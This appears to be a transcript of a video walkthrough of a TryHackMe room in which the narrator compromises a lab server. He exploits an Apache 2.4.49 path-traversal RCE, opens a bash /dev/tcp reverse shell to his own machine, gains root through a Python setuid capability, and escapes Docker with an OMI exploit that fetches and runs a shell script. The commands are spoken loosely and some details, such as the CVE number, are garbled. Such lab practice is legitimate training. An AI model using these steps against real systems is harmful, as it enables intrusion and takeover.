Good afternoon, everyone. My name is Braindead. I train every day. One try hack your room, one new skill, always ethical, and by 30 I will be a professional hacker. So I already have try hack me up. We just gotta pick a room and we just gotta start trying to break into it. So let's see what we got today. Not trying to do a hard room today. Maybe a medium or an easy room is what I'm aiming for. Alright, we have picked the room. It is called Oh My Web Server. Can you root me? And there's no hints, there's no anything. All it says is deploy the machine, attach to the task, and happy hacking. So we have contact with the server. If you can see on the right, we have the ping requests. So first thing is first, let's do an nmap scan. So we're gonna run all of these default scripts. We're gonna detect service versions. We are going to output all these results. Oh no, that's a force. Sorry, that's a force. ON. This is where we're going to output all the results into a text log. We're doing nmap dash or nmap all. And we are going to try to enumerate every port to see what is vulnerable. And what did I miss? I missed the IP address. So let's put the IP address in, and I typed it wrong. No, let me restart that. There we go. Perfect. And we will come right back as soon as the nmap scan is finished and provides results. Okay, and we have one Duolingo Spanish lesson completed, and we have our nmap scans returned. So, of course, we got port 22 open, that's SSH, and we got port 80 open, or HTTP. So, all we need to do is we're going to run on over to that website link on a port 80, and it looks like we got a consultation firm here. So let's see what we can figure out. So let's just run a GoBuster scan, and GoBuster will enumerate all the directories that I provided. So maybe there's a hidden one that we could find. So let's attach the word list, which is W. Ooh, I'm trying to remember the word list. Ooh, help. I just need the command for the word list. Which switch is that? Word list, word list. Word list. Okay. So it's just that, user share word list, and we're gonna do, I think, sec list, right? Oh, this is not working. I am not doing this too well. I need to bring up a previous command here so I could find my word list. What is the proper GoBuster? I've used GoBuster so many times, I can't believe I'm missing the obvious here. GoBuster. I literally can't find what it is. I'm gonna just do this. I need to do the word list, but I can't figure out what it is. Word list. It's not. Word list is a directory, and it's not enumerating when I try to, like, why isn't it auto-populate? What am I typing wrong? User share word list, sec list. Ah, what a pain. You know what, let me do this. Let me ls user share word list. Like, this is what I should have did. Sec list, and then discovery, then I want web content. Then we could do that. Okay, so that's really what I want. And we're gonna hit sec list discovery. web content. Did I spell that right? Web dash content. We can just do a big dot text. Let's see if that works. Okay, that worked. So we're gonna let that run. Let's see if this is a WordPress site by chance. I don't think it is. This seems kind of crafted by support at uideck.com. Okay. Assets is available. CGI bin? No, not available. Unless that is available. And it's just 403. Let's check out assets. See what we can find. Okay. So obviously we are plugins. Let's take a look at that. Avoid console errors in browsers that lack a console. So function methods, method length, while length only stub undefined if console method console equals noop. This is function. Modernizer. Okay, let's take a look at some of these plugins. I don't know if any of these are, if that's the objective, but I'm gonna see if it is. Vulnerabilities. Okay. No direct vulnerabilities, so maybe not. Okay. I'm really trying to find a plugin. Wow. Oh man, the wind is howling outside. I don't know if it's audible through my microphone, but wow. It's a cool autumn day. Popper? I don't think that is what I'm looking for here. Images. That can really only help so much. DS Store? What is a DS Store? So is this a Mac that we are taking control of? Okay, let's go back over here, see if we could find anything else. Okay, so assets is really only the only thing we found. I'm gonna do a common Buster. Now, only if it let me type what I needed. So Buster 2000, excuse me, Buster 2007. Directory, like it's not letting me auto type, which is so unusual. List 2.3, right? Yeah, I can't autocomplete. Big dot text. Let's try that. However, the command works. So, oof. Let me not mess anything up. Main. Let's check out main. Pre-alloder. Okay. Window on load. Headroom. I get fired when the animation is starting. I get fired when the animation is ending. I get fired when you enter a section. I pass the list item of the section. Navigation bar. Filter items on button click. Services. Progress. Testimonial. Magnific. Pop-up. Wow active. Okay. Headroom. Give your page some headroom. So let me go back to 10.1, 201, 5127. And okay. Min JavaScript. So far, I'm not too sure what I'm looking at. Obviously, assets is significant. Team services. There's no other directories. Blog. UI deck. Hello at UI deck. Crafted by UI deck. Really liking this. They really love UI deck apparently. Okay. I feel like I want to look up UI deck website vulnerabilities, but this seems like a very I figured why would it be publicly available? I'm seeing something about SQL injection, but I don't know if that's related to this. Google Dork. Admin. So, okay, not found. Okay, so this I don't think applies. Fix. Remote code execution via. What This is a little bit of a harder one because I don't see what's vulnerable here. Blog details. That's not even working. Now. Presence. Yes. Sign up. Sign up. Test at domain. What happens when we sign up? Nothing. Download? Sign up. Okay. Contact. Test at test.com. Test? Oh. Takes me right back to assets. Isotope? Yeah, let's put this over here. Google. Because one of these has to be the vulnerable one. Isotope. Vulnerabilities. No direct vulnerabilities. Scroll it. Min.js vulnerabilities. It says jQuery, but I don't think that would be our objective. No. Waypoints.min vulnerabilities. No. And plugins. I think I need a hint. Oh, my web server. We get RCE using Apache? No kidding. Is that really what it was? Oh my goodness, I can't believe that's what it was. Alright, so 10.2.1.5.127. Okay, let's... How do I even find the Apache version, though? Okay, let me look back at my nmap scan and see. So we could disregard that. Nmap. Was I able to detect Apache? I got Ubuntu. Apache 2.4.49. Okay. Okay. So let's do some research on this. Apache 2.449 vulnerabilities. Path traversal and remote code execution. Okay, I don't think I would have immediately known this. So this guy gives me a script, which is great. So let's just do that. CVE 20141773. Search exploit Apache HTTP server. Excuse me. So that's what I want. So we're gonna use search exploit. And we're gonna 5H. Okay, let me make sure that it looks like exactly that. Okay. So proof of concept. It wants me to make a targets.txt file. So echo 127. Remember, it's called targets.txt. Cat target. Let's make sure that's good. Okay. Proof of concept 503. 83.sh targets.text. That's the password. Of course, that wouldn't work. Let's do that. The server encountered an internal error. More information. So maybe this didn't work. What was the other one? Bin. Who am I? Percent. Who am I? I don't know what that means. That's the password. Okay, so I don't think that was it. So I guess that was the CGI bin though, that I was having trouble connecting to. Oh, I gotta turn my heater on there. It's a little cold. All right. Okay, so that was the CGI bin though. So, okay. Let's try that again, because I think CGI bin might be my way in, because I did see that it was 403'd. There's a traversal. So this. I don't know if this will work. Request URL is not found on the server. Is CGI bin found on the server? You don't have permission to access the resource. So how do I utilize this? Get CGI bin. Look at that. Okay. So we just gotta erase that. Boom. The server encountered internal error or misconfiguration. Was unable to complete your request. To form them. So that didn't work how I needed it to work. CGI bin. Exploit CGI bin. Apache HTTP server 2.49. Like, I'm finding all these results, but I'm not able to. So that's required. Oh. Okay, so it actually wants me to do a curl instead of just trying to access the website. So let me curl this. I guess that would make more sense, huh? So curl, and then we type the IP address of my web server. Which is 10.201.5.127. Boom. Okay. Then we go CGI bin. Then I copy all that. I think it's hex, right? Alright, I've seen this so many times at this point. I just can't remember what type of encoding that is. So we got that. We're gonna do this. Then we're doing an echo on it. Type explain echo. Okay, and then it's just giving me. Okay. So I wonder if I could actually just did this with Burp Suite instead. I think, yeah, I could have did this with Burp Suite. But that didn't work. That didn't work, though. So let me see why that didn't work. 201 CGI bin bash H. I did spell content type incorrectly, but I don't know if that would have a. Yeah, I didn't think that would have a. Let me look that again. Curl. I'm gonna directly copy this, guys, because I don't know. And I'm gonna just change the IP to reflect mine. .201.5.127. Yeah. But I didn't get Etsy password from it, which is weird. 201.5.127. I don't know. So is he burp suiting this? I'm gonna open Burp Suite because I think that might just be easier. Burp Suite. And for those who don't know, Burp Suite is like a little middleman between the client web server and the web server. A middleman between the client and the web server, so I could alter the GET request that it's doing. So we're gonna go back here. I'm gonna modify this proxy intercept. Yes. Oh, I gotta turn my proxy on. Enable. Let's do that. I'm gonna send this to repeater. What the hell is this? Repeater send. And I get an internal server error. So instead, let's change this. Let's do a %2e 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 Etsy password host and I still get that internal server error. Oh, but I'm changing the host to, is that it? 80? User text application, that looks fine. Accept connection, it actually says close. I don't know why it would be close. Priority, I have no idea what that even means. I am not doing this right for some reason. Let me find just a different walkthrough. Oh, I gotta disable proxy. Disable. Alright. And we can, oh my, web server. Let's take a look here. So they're all pointing to the same thing. Okay, I gotta find a way to, let's do this. 2.49. And he's saying, get this one, the same one I have. I don't get it. 50383.sh targets.txt bin. Who am I? Ah, okay, now it's working. What the? Etsy password? No. I got, maybe I gotta call it like Etsy password. No. Etsy password. I think it might be like bin sh. Well, bin cat, is that what it is? Oh, whoa, no. Oh my goodness, Google. I think it might be actually bin cat. Cat Etsy password? No. Bin cat Etsy password, is that? I wonder why bin sh worked, but okay, so like if I do this, bin ls. Okay, regardless, we might as well just get reverse shell at this point. So let's get a reverse shell going here. Reverse shell generator. We're obviously gonna do bash. Let me make a I'm just turning on my receiver so I could do it. Bash, can we do this? I think we could do any one of these, to be honest. Bin -i dev tcp 10.6.56.192 1337 0 1. Damn it. Don't remember exactly how to do this. No. That didn't work, right? Yeah. Unless it's file or directory. Damn it. maybe I could do it like this. Okay, so that. And then, let me do that. What does that mean? No file or descriptor. Maybe I just can't use dev-tcp. NC. What if I do this one? I'm gonna try this one. What am I doing? 10, 6, 56, 192, 1337, space. Oh, did I get it? Cool. All right. Who am I? W data. What? What? Bruh. Did I just remote into myself? I don't understand. How did I just remote into myself? So NC, obviously 1337. Am I not executing this on? Like, I thought I was executing this on the server. How did that? Can't create. Who am I? Like, what? Like, bruh. That is my system. How did I mess that up? Like, yeah, I should have got Damon, actually. Yeah. So, what did this guy do? Because I don't know what in the world I just did there. I guess I gotta copy him, because what was that? No, bin, I gotta leave bin dash c dev tcp 10.56.192.1337. I feel like I tried this one, and then somehow I think I got an error. Did I get it? Did I even have it listening? I didn't even have it listening. So I think that might have worked. Okay, who am I? Okay, good. What did I do wrong last time? I don't know what I did wrong last time. That, maybe when I review the footage, I'll know what I did wrong. But that was kind of silly. Oh my goodness. Home. LSLA. No. LSLA. Docker. Opt. Let me just see. Can I find anything? I'm about to put linpeas on here. Let's get linpeas. Oh, can't terminate that. Let's go back. Let's do a Python 3 and make server 8000. Let's go temp. Anything in here? wget 1066. On port, I put 8000. linpeas.sh. Oh my god, it doesn't even have wget. How did he do it? Okay, it actually wanted me to go investigate that Docker container. Dang, where did I even find that Docker container? Home? Is that where I found it? No. R. LSLA. Backups. Garbage. CD. What am I searching for now? How do I find that? Docker. Where was I even located? So, actually, it was here that I was pointing to. So, cd.docker. Nope. Docker. Oh, I should probably stabilize this shell, to be honest. Python 3 -c import putty dot spawn. I need to pull up I don't remember the rest. Of course, the easiest part. Bin bash. And we close that. Ooh, I gotta make that to oof. I gotta change it. Import putty dot spawn. Bin bash. Okay, great. Export. Xterm. No, export equals xterm. Why don't I have this properly written? It doesn't really matter. I'm fine with that. So ls-a. I don't think anything should be in here. That's just nonsense. This indicates we're in a Docker container. So we must escape the Docker container. So he found some shit. I don't know how he found that. So we're gonna go back to home. LSLA temp. I just gotta keep looking through all the directories, really. Dev. Doesn't have wget, which is crazy. Instead of wget, look. Curl? I don't know if you could curl it. Okay, you can't curl it. So I'm actually gonna see temp curl. HTTP. I'm sure there might be a better way to do this. linpiece.sh. Okay, Jesus Christ. Okay, here, you know what? Curl to download a file other than wget. Oh, curl. Oh. On port 8000, linpiece.sh. That's what I wanted to do. Okay, beautiful. So let's execute linpiece.sh. Permission denied. linpiece.sh. linpiece.sh. Okay, so linpiece is gonna run. I'll cut the video and we'll come back when linpiece is finished. So it appears my linpiece keeps crashing when I get to this cloud section. I'm just gonna continue to enumerate because, or well, manually enumerate because I can't get past this section for some reason. So we're gonna, whoops, close that. Oh, did I get past it? Oh, no, I didn't. Okay, so we just gotta get back my reverse shell. Oh, whoops. Close that. There we go. That should give me my reverse shell back. I'm not stabilized, but what are you gonna do? Should I stabilize it? I'm gonna stabilize it. I might as well. Import putty.spawn bin bash. Okay, cool. I'm stabilized. So this person, he looked through like every directory, I'll be honest. I don't know how he knew what directory to look for. But he found a Python script. I mean, I was in temp. Oh, excuse me. I was in temp. I don't see what he's looking for. He's using AL though. Which, I mean, that's fine. He found this Omni. Like, I don't see that at all. So I'm just gonna keep looking until I find that, because it has to be somewhere in here. Did I have? No. So what is any of this? Are these directories? Lib. No, let's see. cat Etsy password? Can I do this? I can. So, anything of note? Don't think I see anything of note here. Backup would be, you know, something. No. Cache? LS? No. CD temp? No. Anything? No. I gotta find where he found this temp location. Unless I could just type in the word find. No. Find.py? I don't know exactly how to search. Search bash for a file. I think this is bash. No, that's just find. Find dot dash name ami.py. Jesus Christ. I don't know what proc is. I mean, it could have just... Oh, do I have to filter it? How do I filter out... filter out errors. Who's the... It's that dev null thing, I'm pretty sure. There we go. There we go. There we go. Okay. Find... dash name... Ami.py. That's what it was. This is... Okay, great. That did not help me at all. Find everywhere. Oh, you know what? I should probably go to that. Find name Ami. Oh my goodness, pi. Without filter, you can redirect standard input. I'm just gonna do a 2 and 1. See what that does. Permission denied though. I don't really care for that error. Name ami.py to dev no. But I'm not finding it. Where is this file? We're gonna go back to the first one here. See if maybe this guy describes where the file is located. So he uploaded linps, which is what I tried to do. Python has capabilities. It also seems we're trapped inside a container. I knew that. Oh. Of course. How could I have been so silly? Okay, let me, okay, no, put that back up. Okay, let's see here. Is it a hacking? Get the fuck out bins. Okay, so this is a privilege escalation bin. I should have, I can't believe I didn't even realize that. Just literally gave me, reverse shell, but I can also use it to privilege escalate, can't I? Right, that's what it was saying to do, right? Was privilege escalate? Oh, this actually gave him root. Wait. Oh, wait, no. OS set UID. I want to find that command he used. Oh, okay. Okay, so if there is the cap, so what he found here was cat set UID plus EP. If that is set or is executed by another binary, we could use this OS that set UID 0 OS system bin. Is that what he typed? Oh, but I didn't use the right command. Dash C import OS set UID 0 OS system bin. Who am I? Okay, so I'm root now. So, which is great, except I have no idea where the flag is. Name user dot text. Whatever. What the hell is it? Okay, so it's just in root. Okay, cat user dot text. Alright, so we got that. Okay. Back over here. Back over here. Alright, so we got one. That's gonna blow my ears up. Oh, I disabled the volume today. Wow. Okay. So now we have to escape the Docker container, which I've never actually done before. So this is going to be interesting. Maybe I could do linpeas. We're gonna do linpeas because that's what he did. But oh, if my linpeas crashes me again, I have to do all this over. Which, I mean, it's not terrible. Let me make some notes. Let me make some notes. That's what I should do. So that way I can just redo this. Give me one moment as I make some notes. Alright, I just had to make some notes so I knew how to get back to this section. So we're going to go back to temp here. And so it's saying there's actually a script in this temp folder. But I don't see it anywhere. So I'm gonna actually just try this. I don't see it though. Omni.py? Yeah, I don't see this file it's talking about. Find name omni.py. Where am I at right now? Find name Ami. Huh. Yeah, I don't really know where his file is located. I'm gonna run linpeas again. Now that I have admin, I mean. Sudo linpeas. I don't think it'll prompt me here. Oh, I can't even do sudo. linpeas.sh. You already root? Yes, I am. Yes, I am. I gotta get stuck here again. That's what I figured, though. What I'm really hoping is that this thing finds omi.py, because where is that? Let's do just one more. This guy ran a web application scan with Nessus. Wow. Huh. That's clever. Path traversal, so that's how he found this. And then he ran the curl. Started a reverse shell. He's stabilizing. Let's find that system. We can assume safe for working within a Docker container. And we pulled over linpeas. Oh, okay, so linpeas would have actually notified that this is a privilege escalation vulnerability. So he escalated to root. He grabbed the user flag. A static nmap binary was uploaded to the target system. So he pulled over nmap. Wow. So open SSL. Wow. What? Oh, nice. And my LinPiece is moving forward. Okay, so he found a vulnerable port, and that port is tied to OMI, which is this Python script we've been trying to locate. So I can't even believe that. That's incredible. This site might contain, I don't really care. Go. And it's not even found. This is a really interesting site. I don't think I have this. So we're looking for OMI again here. So OMI. Onto the system. I'm gonna literally just do that at this point. Okay, so I wonder if this just showed me where OMI is, though. That's what I really wanna. No. No. OMI. No. If anything, I will pull down the script. Okay, let's do that. Let's pull down this script that this nice guy has found us. Now, that didn't do what I wanted, though, did it? So we will just, are we in temp still? Okay, curl http 10, oh, I have to download it first. Right, let me download it first. So, we'll do that. Then I'll host it. Proof of concept. Download. Great. And now let me go back to my terminal. Move from my downloads. What was this? AMI? We're going to put that here. Okay, we're going to run that back on server 8000. Oh, I already have it in use. So I could disable this. We're going to close that just so I don't get confused. Then we're going to put it back on. Okay. Now we're going to curl me 8000. We're going to get my Amiga.py output. I think, right? That's how he did it. I never used the output command. Okay. Amiga.py. Alright, and we're gonna make that executable just in case. Python 3 Amiga.py 172.17.01. So that's obviously the okay, but how do you get that IP address? Let me just see if I could find real quick if LinPiece enumerated the IP address for me. Server address 172.2. Okay, so there. That's all I needed. Okay, so 172. Blah blah blah. Okay, so now we know. But that one. How did we know it was .1? Did we just guess? Since I mean .2, and then we just assume .1 since this would be the Docker, and then I guess the previous one would be. Okay. Okay. So let's go back to the bottom. So now that we know that that is that -c. I could just get myself a shell, but I might just take the easy route here. Oh my god, that pi. ls. Oh, command. That's what it's for. Pi t172.1c. Who am I? Root. Great. 172.1. Dir? Is this that's why? Oh my god, that pi t172.1c. I'm about to just. So host name. I mean, what? LS? What uses host name? Maybe it's just be easier to do a reverse shell. I just don't know. Host name. And perform RCE. Bash. Should I just do the reverse shell? For RCE on the system to download, execute. I'm about to just do that. I think maybe that'd be the easiest. Well, I mean, let me try this one more time. 172.17, cat root flag.txt. Okay, let's just make a shell. So we need to make a reverse shell. I think I have a. Oh, is it GitHub? It doesn't look like there's a Windows machine, so what is this? Okay, I'm about to just pull up my. Let's just, I gotta be careful here. Let me try that again. I have a generator here, but I don't know if, maybe this. I wonder if I could just use this. I never. I mean, what if I just did this command? I mean, did I really need to? Oh my god, Python 3, distributor. I'm sure there's just an easier way to do this though. Like, I just need to get the flag ls. Is it? What's going on here? Okay. We're just going to. I think I'm still hosting this, aren't I? I am still hosting it, so. My session froze, which sucks. What are you gonna do? We're gonna try to connect back. Let's see, how do we connect back? We gotta find whatever command that was. Okay. And we are this person. Now we have to root. And we did that. Exploiting the set UID. So this should give me root. Whenever it loads. Come on. Like, what's going on? Oh, okay. Who am I? Okay, it wasn't stabilized. Dash C import putty.spawn bin bash. Great. Okay, so we're root. Now we need to. We gotta curl my script over to the main machine. So that's from 66. 1 to 8,000. I think I named this cell. Oh, and he actually performed bash. Did I put 999 as the? Okay, so I actually did delete, so I'm gonna turn that on. Hopefully, I think I did delete on this one too. Hopefully it doesn't cause some sort of interference. That's because it's not called that. Okay. Python 3. Oh my god. .py 172.1701. We're gonna do a curl 10.656 shell.sh, and we're gonna execute the script. And did I get reverse? Who am I? Oh my god. That was a hard one. This was quite the room. We're gonna go back to home. Ubuntu. No, even further back it looks like, right? I gotta go to root, home, ls, cd, Ubuntu, ls. Okay, you know what, let's do this. Cause this is, I can't find it. Root. Then, I don't think it'll spam me. Oh boy. Okay, there we go. Root. That's what I should have done. I don't even know why I didn't. Excellent. Alright. Boom. That's Web Server. That was a tough one. I definitely have to use the walkthrough for that one, but that was very informative. Alright. Thanks all. See you tomorrow.